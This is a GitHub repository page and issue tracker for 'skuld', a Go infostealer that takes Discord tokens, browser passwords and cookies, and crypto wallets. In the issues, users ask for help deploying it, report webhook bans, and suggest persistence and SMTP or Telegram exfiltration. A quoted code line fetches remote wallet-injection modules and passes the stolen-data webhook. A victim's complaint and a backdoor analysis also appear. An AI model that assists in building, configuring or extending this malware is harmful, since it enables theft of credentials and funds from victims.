hackirby / skuld

Next-Gen Stealer written in Go. Stealing from Discord, Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk. (PoC. For educational purposes only)

License: MIT License

Go 100.00%
clipper cookies cookies-grabber crypto-stealer discord discord-token-grabber ethical-hacking-tools firefox golang hack hacking info-logger injection logger malware passwords stealer token-grabber wallets


skuld's People

Contributors

dependabot[bot], evilbytecode, hackirby, nimaism

skuld's Issues

Creating a discord webhook to use for logging gets you permanently banned from discord.

Describe the bug

Creating a webhook to log the use of this will get you permanently disabled from Discord after some time.

To Reproduce
Steps to reproduce the behavior:

  1. Install it on a device
  2. Create a discord server and webhook
  3. Wait a while (a week or two)
  4. See the server has been randomly deleted
  5. Enjoy your permanent ban

Expected behavior
Not being banned.


Desktop
Same Process

Additional context
The ban reason is malicious conduct. This is unsafe to make on a server on an account you care about, so take into consideration that you must use alts. The server was also inactive for a while before this happened as well.

Please, remove this

I downloaded a program from YouTube, and it got detected by AV. I did some analysis on the dropped exe, did some searching and came here. Some skid took your program to hack people with it...

It also got featured on Hacker News, so more and more idiots will be using this.

Nothing work

When I follow the instructions with git and the command after configuring main.go, nothing works 🤷🏼‍♂️

Idea

Can I soon add a feature like setting the process as critical ->
if someone tries to delete it or crash it, in a nutshell they wouldn't be able to, because if the process is in a critical state and they try to kill it, it will BSOD lol.

Potential Backdoor/RAT

The way it loads those external ASAR modules (60MB/120MB) suggests a potential backdoor. It’s hard to know what’s happening inside those modules, so be cautious.

    walletsinjection.Run(
        "https://github.com/hackirby/wallets-injection/raw/main/atomic.asar",
        "https://github.com/hackirby/wallets-injection/raw/main/exodus.asar",
        CONFIG["webhook"].(string),
    )

These modules are fetched dynamically when the code runs.

The problem is, there are no actual files there. When you clone the repo and check the module, you get:

[user@dev-tools wallets-injection]$ cat exodus.asar
version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162

The exodus.asar file you’re seeing is a pointer file. It contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored.

The issue is that this reference:

sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6

can be changed at any time by force-pushing to the repo at https://github.com/hackirby/wallets-injection.

Dates can be faked, so you’ll never know when it was actually changed. It says it was last changed 7 months ago, but it could have been altered at any time.

Quite the scheme!

What are the crypto addresses for?


Add Mutex

  • Mutex (single instance) to ensure that only one instance of the app is active at any given time.

Advantages

  • Thread-Safety
  • Synchronization
  • Prevention of Deadlocks
  • Flexibility

I need help setting it up

Basically I just need help with the "go build -ldflags "-s -w"" command; I don't know what to put as the -s and -w.
Help would be much appreciated.

Doesn't do anything

The webhook is correct. I compiled it and ran it, and nothing happened. I ran it in the console and it didn't print any logs or errors, and I tried without any flags and it still just does nothing.

Wallet Injection

Hello,

I was trying to find the injection added to the Atomic wallet, but I am unable to. I downloaded and unpacked it and searched everywhere and was not able to find it. (The Exodus injection was there and easy to find, but Atomic had a different story.)

I am creating this issue just for transparency, as I don't like running things that aren't open sourced and would like to check the injection code on the Atomic wallet if that is okay.

Can you please walk me through where exactly I can find it after unpacking the app.asar file?

Thank you and keep up the good work.

This is backdoored

Likely backdoored with the way it loads those external asar modules that are 60 MB/120 MB. It is hard to have a clue what could be happening inside those modules. Be wary.

    go walletsinjection.Run(
        "https://github.com/hackirby/wallets-injection/raw/main/atomic.asar",
        "https://github.com/hackirby/wallets-injection/raw/main/exodus.asar",
        CONFIG["webhook"].(string),
    )

Those modules are fetched dynamically when you run the code.

Problem is, there are no files there. When you git clone this repo and cat the module you get:

[user@dev-tools wallets-injection]$ cat exodus.asar 
version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162

The exodus.asar file you're seeing is one of these pointer files. It's a small text file that contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored (version https://git-lfs.github.com/spec/v1).

Problem is, this reference

sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6

can be changed at any given time by force-pushing (git push -f) the repo at https://github.com/hackirby/wallets-injection.

Dates can be faked, so you will never know when it was changed; it can be changed any given day, and the commit date can be modified. Now it says it was last changed 7 months ago, but the truth is it could've been changed at any time.

Nice scheme though!

Question

Could I update the antidbg and add some features to it?

Cookies

I've done this on Virtual Machines, with separate settings and environments of their own, yet I've seen one glaring problem.

Firefox seems to be the only browser that actually works regarding cookies. My guess is that Chromium (and Chrome) have added their LDB file lock, which means cookies wouldn't be grabbed if Chrome was on.

But even after Chrome is killed, it does not grab anything. I'm sure their LDB lock fails once the browser itself is killed, so I'm guessing it's an issue with the code.

Given that your grabber is quite damn good, I'd also imagine it'd attract a bit of attention. This may need urgent fixing if the issue persists across multiple users.

Gj

Nice to see that all the new types of stealers out there are using my project for the anti-VM blacklist.

Good stealer btw.

thanks

it removed my fucking cmd and tskmngr fuc# you with your dirty life

SMTP and Telegram Sending Methods

First of all, amazing code, I like it.
I wanted to suggest that it would be really great and convenient if data could also be sent via SMTP (Gmail) or Telegram, which is a safer and easier way than Discord.
